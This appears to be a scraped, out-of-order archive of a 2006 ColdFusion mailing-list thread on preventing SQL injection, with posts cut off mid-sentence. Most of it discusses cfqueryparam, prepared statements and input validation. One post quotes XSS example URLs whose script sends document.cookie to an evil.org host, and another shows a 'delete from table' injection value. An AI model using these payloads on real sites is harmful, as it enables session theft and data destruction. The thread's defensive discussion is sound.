On 8/25/06, Robertson-Ravo, Neil (RX) <[EMAIL PROTECTED]>
wrote:
>
> No the question was not ColdFusion, the question was why re-invent the
> wheel
> - just use cfquery and cfqueryparam.
Re-inventing the wheel is relative to what you're doing and the frame of
reference.
I can think of many reaso
I think I am going to try an object repository using the (under used)
coldfusion JWS service.
I think I did this before but I have no idea why I dropped the idea it's so
simple to do.
JWS example
import org.hsqldb.WebServer;
import java.io.*;
public class MyWebserverObject extends WebServer imp
te at http://www.reedexpo.com
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 20:08:18 2006
Subject: Re: coldfusion sql injection
One of things I am thinking about doing today is running an outside process
(hsqldb web server started by CF using cfexecute) which contains all my
obj
Mark,
We all have time frames and I was just offering a suggestion that has saved
me time with other clients.
I wish you success on your endeavor.
Teddy
~|
Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hit
Objects stored in a repository is very much an Object Oriented DB concept.
CF doesn't really support this idea of storing an object. Most of this is
accomplished by storing data in a RDMS.
Centralizing where you update metadata for queries is very much like ORM
models. An example would be Reacto
alk
Subject: Re: coldfusion sql injection
If you spend that much time maintaining queries, perhaps you need to
organize the queries into an ORM model and alleviate some routine tasks.
Teddy
~|
Introducing the Fusion Authority Q
One of things I am thinking about doing today is running an outside process
(hsqldb web server started by CF using cfexecute) which contains all my
objects which coldfusion uses like all my PrepareStatements and cfquery
objects. I wanted to use objects which were saved in a DB now this is my
chance
; From: Dan Plesse
> To: CF-Talk
> Sent: Fri Aug 25 17:47:24 2006
> Subject: Re: coldfusion sql injection
>
> My example using PrepareStatements.
>
> This makes a "sql injection attack" a thing of the past and its also
> faster.
>
>
> PreparedStatement ps
If you spend that much time maintaining queries, perhaps you need to
organize the queries into an ORM model and alleviate some routine tasks.
Teddy
~|
Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hitting,
eries. Doing it the
way described below ... I might as well use ASP :)
-Mark
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Friday, August 25, 2006 12:08 PM
To: CF-Talk
Subject: RE: coldfusion sql injection
> My example using PrepareStatements.
>
> Thi
> My example using PrepareStatements.
>
> This makes a "sql injection attack" a thing of the past and
> its also faster.
While you might have perfectly valid reasons for doing this, it is what
CFQUERYPARAM does for you, if you're using CFQUERY. If I wanted to write all
my database connection stu
te at http://www.reedexpo.com
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 17:47:24 2006
Subject: Re: coldfusion sql injection
My example using PrepareStatements.
This makes a "sql injection attack" a thing of the past and its also faster.
PreparedStatement ps =
My example using PrepareStatements.
This makes a "sql injection attack" a thing of the past and its also faster.
PreparedStatement ps = con.PrepareStatement("INSERT INTO MYTABLE VALUES
(?,?,?,?);");
ps.setInt(1, 3);
ps.setString(2, "something");
ps.setString(3, "and");
ps.setString(4, "other");
>I will pipe up here, and ask one question though. And the reason I ask this
> is that it's maybe different for me, but I tend not to use the cfqueryparam
> in cffunction's that have cfarguments and are typed.
>
> I find it is not required as the function will throw an error anyway, and
> the only
I have a good example of injection and XSS here...
http://mkruger.cfwebtools.com/index.cfm?mode=alias&alias=security.pyramid.co
de
-Original Message-
So there's the question. Can someone provide an example of a
working sql injection attack?
~
On 8/24/06, Dave Watts <[EMAIL PROTECTED]> wrote:
>
> > More evil is stuff like:
> >
> > http://trusted.org/search.cgi?criteria=
> I will pipe up here, and ask one question though. And the
> reason I ask this is that it's maybe different for me, but I
> tend not to use the cfqueryparam in cffunction's that have
> cfarguments and are typed.
>
> I find it is not required as the function will throw an error
> anyway, and t
> So there's the question. Can someone provide an example of a
> working sql injection attack?
Sure:
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
There's a whole section in there about multi-step SQL injection attacks
against systems that escape all single quotes. They are certa
CFQUERYPARAM binds the argument into the statement, preventing it from
being interpreted as SQL.
On 8/25/06, Andrew Scott <[EMAIL PROTECTED]> wrote:
> I will pipe up here, and ask one question though. And the reason I ask this
> is that it's maybe different for me, but I tend not to use the cfquer
I will pipe up here, and ask one question though. And the reason I ask this
is that it's maybe different for me, but I tend not to use the cfqueryparam
in cffunction's that have cfarguments and are typed.
I find it is not required as the function will throw an error anyway, and
the only time that
This has been necessary for ages and I'm glad they finally added it
(not that I've used a DW code gen wizard for anything, apart from the
IE ActiveX activiation thing, in years).
On 8/25/06, Dave Watts <[EMAIL PROTECTED]> wrote:
> Even the Dreamweaver 8 code-generation
> wizards generate CFQUERYP
> More evil is stuff like:
>
> http://trusted.org/search.cgi?criteria=
More evil is stuff like:
http://trusted.org/search.cgi?criteria=http://evil.org/badkama.js%27>>"> Go to trusted.org
OR
http://trusted.org/account.asp?ak=
document.location.replace
('http://evil.org/steal.cgi?'+document.cookie);<Re: coldfusion sql injection
I precompile everything. No DSN needed and since cfquery is serializable I
make a unique backup copy of tables for fun.
Example application.cfm
Some CFC
thats it!
On 8/23/06, Jochem van Dieten <[EMAIL PROTECTED]> wrote:
>
> Russ wrote:
> > So there's the question. Can someone provi
Russ wrote:
> So there's the question. Can someone provide an example of a working sql
> injection attack?
Plenty have been posted in this thread. Even more are in the archives. And if
that isn't enough, check the archives of the penetration-testing securityfocus
mailinglist.
Jochem
~~~
I posted one earlier. Replace a numeric value that is sent via form or URL
with some SQL and the SQL will execute.
Snake
-Original Message-
From: Russ [mailto:[EMAIL PROTECTED]
Sent: 23 August 2006 19:16
To: CF-Talk
Subject: RE: coldfusion sql injection
So there's the question.
So there's the question. Can someone provide an example of a working sql
injection attack?
> -Original Message-
> From: Jochem van Dieten [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, August 23, 2006 2:05 PM
> To: CF-Talk
> Subject: Re: coldfusion sql injection
>
Russ wrote:
> The string is also autoescaped even if you don't use cfqueryparam... at
> least on SQL server. Is it not with other DB systems?
It is. But that is not enough.
Jochem
~|
Introducing the Fusion Authority Quarterly U
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
Autoescape is done by CF, so it works for any DB.
--
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
> -Original Message-
> From: Jeff Guillaume [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, August 23, 2006 10:19 AM
> To: CF-Talk
> Subject
Let alone the security aspect, it also improves performance by causing your
database server to bind the variables before executing the query.
Straight from Macromedia:
http://tinyurl.com/oo49m (link to docs)
- Allows the use of SQL bind parameters, which improves performance.
- Ensures that va
Rick Root wrote:
> Snake wrote:
>> Select * from table
>> Where x = #form.value#
>>
>> And form.value = (delete from table)
>
>
>
>
>
>
>
> or
>
>
>
>
And that catches the form variable "3e4" how exactly?
> is *NEVER* "required" if you're willing to code the other
> stuff.
>
> B
--Original Message-
From: Jochem van Dieten
To: CF-Talk
Sent: Wed Aug 23 09:10:26 2006
Subject: Re: coldfusion sql injection
Russ wrote:
> That's the thing... When is cfqueryparam REALLY necessary for security? I
> want to see some examples that require cfqueryparam.
Always. For the s
Russ wrote:
> That's the thing... When is cfqueryparam REALLY necessary for security? I
> want to see some examples that require cfqueryparam.
Always. For the simple reason that you are not able to prove that any other
solution is secure.
Jochem
Well, we don't NEED to use CF to write web apps either, but it makes
my job a lot easier.
On 8/23/06, Russ <[EMAIL PROTECTED]> wrote:
> Where x is numeric... which can be fixed by using a lot of other things
> other then cfqueryparam, such as
>
>
> > Select * from table
> > Where x = #Val(form.val
security.
Russ
> -Original Message-
> From: Snake [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, August 22, 2006 8:13 PM
> To: CF-Talk
> Subject: RE: coldfusion sql injection
>
> Select * from table
> Where x = #form.value#
>
> And form.value = (delete from table
Snake wrote:
> Select * from table
> Where x = #form.value#
>
> And form.value = (delete from table)
or
is *NEVER* "required" if you're willing to code the other
stuff.
But if you get in the habit of NOT using cfqueryparam, and you code the
other stuff, you have to worry about
Select * from table
Where x = #form.value#
And form.value = (delete from table)
-Original Message-
From: Russ [mailto:[EMAIL PROTECTED]
Sent: 22 August 2006 23:57
To: CF-Talk
Subject: RE: coldfusion sql injection
That's the thing... When is cfqueryparam REALLY necessary for sec
That's the thing... When is cfqueryparam REALLY necessary for security? I
want to see some examples that require cfqueryparam.
Russ
> -Original Message-
> From: Jeff Guillaume [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, August 22, 2006 6:53 PM
> To: CF-Talk
> Subject
I just make sure I always scrub user-entered data when possible, but at the
very least you should use to pass data into queries.
---
Jeff Guillaume
Kazoomis
www.kazoomis.com
>Now, it is my belief that CF auto escapes single quotes, so sql injection
>into a string is not possible. I believe it'
Now, it is my belief that CF auto escapes single quotes, so sql injection
into a string is not possible. I believe it's still possible if you have a
number, but pass in a string, but that can be defeated by using VAL.
Someone pointed me to an article from 2 years ago that describes how to do
41 matches
Mail list logo